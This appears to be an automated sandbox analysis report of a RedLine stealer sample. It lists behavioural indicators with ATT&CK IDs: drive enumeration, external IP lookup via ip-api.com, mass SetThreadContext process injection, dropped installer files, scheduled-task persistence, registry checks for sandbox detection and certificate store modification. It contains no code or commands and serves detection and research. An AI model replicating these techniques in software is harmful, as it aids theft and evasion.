redline | 90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\E:	installer.exe
File opened (read-only)	\??\Y:	installer.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\X:	installer.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\T:	installer.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	ip-api.com

Suspicious use of SetThreadContext 64 IoCs

description	pid	Process	procid_target
PID 4584 set thread context of 2384	4584	Tue11e4e580f2e8141a3.exe	105
PID 4584 set thread context of 5148	4584	Tue11e4e580f2e8141a3.exe	116
PID 4584 set thread context of 5800	4584	Tue11e4e580f2e8141a3.exe	127
PID 4584 set thread context of 3376	4584	Tue11e4e580f2e8141a3.exe	140
PID 4584 set thread context of 5856	4584	Tue11e4e580f2e8141a3.exe	153
PID 4584 set thread context of 5308	4584	Tue11e4e580f2e8141a3.exe	156
PID 4584 set thread context of 4696	4584	Tue11e4e580f2e8141a3.exe	165
PID 4584 set thread context of 6120	4584	Tue11e4e580f2e8141a3.exe	169
PID 4584 set thread context of 1908	4584	Tue11e4e580f2e8141a3.exe	185
PID 4584 set thread context of 1028	4584	Tue11e4e580f2e8141a3.exe	224
PID 4584 set thread context of 4804	4584	Tue11e4e580f2e8141a3.exe	232
PID 4584 set thread context of 5064	4584	Tue11e4e580f2e8141a3.exe	237
PID 5556 set thread context of 2440	5556	services64.exe	245
PID 4584 set thread context of 2216	4584	Tue11e4e580f2e8141a3.exe	240
PID 4584 set thread context of 5948	4584	Tue11e4e580f2e8141a3.exe	247
PID 4584 set thread context of 4824	4584	Tue11e4e580f2e8141a3.exe	250
PID 4584 set thread context of 3480	4584	Tue11e4e580f2e8141a3.exe	252
PID 4584 set thread context of 3952	4584	Tue11e4e580f2e8141a3.exe	253
PID 4584 set thread context of 1724	4584	Tue11e4e580f2e8141a3.exe	255
PID 4584 set thread context of 5536	4584	Tue11e4e580f2e8141a3.exe	257
PID 4584 set thread context of 1880	4584	Tue11e4e580f2e8141a3.exe	259
PID 4584 set thread context of 1580	4584	Tue11e4e580f2e8141a3.exe	260
PID 4584 set thread context of 2012	4584	Tue11e4e580f2e8141a3.exe	261
PID 4584 set thread context of 3276	4584	Tue11e4e580f2e8141a3.exe	262
PID 4584 set thread context of 936	4584	Tue11e4e580f2e8141a3.exe	263
PID 4584 set thread context of 2844	4584	Tue11e4e580f2e8141a3.exe	264
PID 4584 set thread context of 1528	4584	Tue11e4e580f2e8141a3.exe	266
PID 4584 set thread context of 5028	4584	Tue11e4e580f2e8141a3.exe	267
PID 4584 set thread context of 3220	4584	Tue11e4e580f2e8141a3.exe	268
PID 4584 set thread context of 2056	4584	Tue11e4e580f2e8141a3.exe	270
PID 4584 set thread context of 3300	4584	Tue11e4e580f2e8141a3.exe	271
PID 4584 set thread context of 3484	4584	Tue11e4e580f2e8141a3.exe	272
PID 4584 set thread context of 240	4584	Tue11e4e580f2e8141a3.exe	273
PID 4584 set thread context of 2268	4584	Tue11e4e580f2e8141a3.exe	274
PID 4584 set thread context of 1812	4584	Tue11e4e580f2e8141a3.exe	275
PID 4584 set thread context of 1968	4584	Tue11e4e580f2e8141a3.exe	277
PID 4584 set thread context of 1020	4584	Tue11e4e580f2e8141a3.exe	281
PID 4584 set thread context of 2636	4584	Tue11e4e580f2e8141a3.exe	282
PID 4584 set thread context of 4676	4584	Tue11e4e580f2e8141a3.exe	285
PID 4584 set thread context of 5904	4584	Tue11e4e580f2e8141a3.exe	287
PID 4584 set thread context of 4668	4584	Tue11e4e580f2e8141a3.exe	288
PID 4584 set thread context of 236	4584	Tue11e4e580f2e8141a3.exe	289
PID 4584 set thread context of 3008	4584	Tue11e4e580f2e8141a3.exe	290
PID 4584 set thread context of 5892	4584	Tue11e4e580f2e8141a3.exe	291
PID 4584 set thread context of 3524	4584	Tue11e4e580f2e8141a3.exe	292
PID 4584 set thread context of 3416	4584	Tue11e4e580f2e8141a3.exe	293
PID 4584 set thread context of 4636	4584	Tue11e4e580f2e8141a3.exe	297
PID 4584 set thread context of 2536	4584	Tue11e4e580f2e8141a3.exe	298
PID 4584 set thread context of 5664	4584	Tue11e4e580f2e8141a3.exe	299
PID 4584 set thread context of 3708	4584	Tue11e4e580f2e8141a3.exe	303
PID 4584 set thread context of 6068	4584	Tue11e4e580f2e8141a3.exe	307
PID 4584 set thread context of 5104	4584	Tue11e4e580f2e8141a3.exe	310
PID 4584 set thread context of 5292	4584	Tue11e4e580f2e8141a3.exe	311
PID 4584 set thread context of 3828	4584	Tue11e4e580f2e8141a3.exe	312
PID 4584 set thread context of 2240	4584	Tue11e4e580f2e8141a3.exe	313
PID 4584 set thread context of 1456	4584	Tue11e4e580f2e8141a3.exe	314
PID 4584 set thread context of 5168	4584	Tue11e4e580f2e8141a3.exe	315
PID 4584 set thread context of 2472	4584	Tue11e4e580f2e8141a3.exe	316
PID 4584 set thread context of 1200	4584	Tue11e4e580f2e8141a3.exe	318
PID 4584 set thread context of 3352	4584	Tue11e4e580f2e8141a3.exe	319
PID 4584 set thread context of 5012	4584	Tue11e4e580f2e8141a3.exe	320
PID 4584 set thread context of 5472	4584	Tue11e4e580f2e8141a3.exe	322
PID 4584 set thread context of 2784	4584	Tue11e4e580f2e8141a3.exe	323
PID 4584 set thread context of 1240	4584	Tue11e4e580f2e8141a3.exe	324

Drops file in Program Files directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\is-UF64N.tmp	ultramediaburner.tmp
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\is-4U4S2.tmp	setup_2.tmp
File created	C:\Program Files\Internet Explorer\LVIHCMCUZN\ultramediaburner.exe	46807GHF____.exe
File created	C:\Program Files\Internet Explorer\LVIHCMCUZN\ultramediaburner.exe.config	46807GHF____.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-O8S3A.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\WindowsPowerShell\Xinaerubaege.exe	46807GHF____.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Xinaerubaege.exe.config	46807GHF____.exe
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp

Drops file in Windows directory 29 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI85F3.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8F24.tmp	msiexec.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp.tmp	WerFault.exe
File created	C:\Windows\Installer\f7482b3.msi	msiexec.exe
File created	C:\Windows\SystemTemp\~DF119B72A6566121D5.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8899.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI877D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI87FB.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI89C2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8593.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8613.tmp	msiexec.exe
File created	C:\Windows\Tasks\AdvancedWindowsManager #1.job	MsiExec.exe
File created	C:\Windows\SystemTemp\~DFE0B050049CB7C482.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\f7482b3.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI871F.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9000.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DFF89F9BCD0042F32C.TMP	msiexec.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe
File opened for modification	C:\Windows\Installer\MSI8563.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DF8A2192FDADFB8CDE.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8A31.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8633.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8E87.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8458.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI85B3.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 16 IoCs

pid	pid_target	Process	procid_target
4556	4552	WerFault.exe	103
4672	3928	WerFault.exe	93
2580	1212	WerFault.exe	102
5908	4536	WerFault.exe	99
5304	6136	WerFault.exe	134
3948	5236	WerFault.exe	119
1284	5296	WerFault.exe	120
2348	3752	WerFault.exe	163
5508	2472	WerFault.exe	154
888	4164	WerFault.exe	144
5256	3188	WerFault.exe	193
5532	5188	WerFault.exe	211
5108	5524	WerFault.exe	226
3060	1020	WerFault.exe	281
4076	2784	WerFault.exe	323
1064	5476	WerFault.exe	350

Checks processor information in registry 2 TTPs 64 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
5852	schtasks.exe
5808	schtasks.exe

Enumerates system info in registry 2 TTPs 35 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
3956	taskkill.exe
3872	taskkill.exe

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	sihclient.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	sihclient.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\8\52C64B7E	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	sihclient.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	sihclient.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\7\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	sihclient.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	sihclient.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
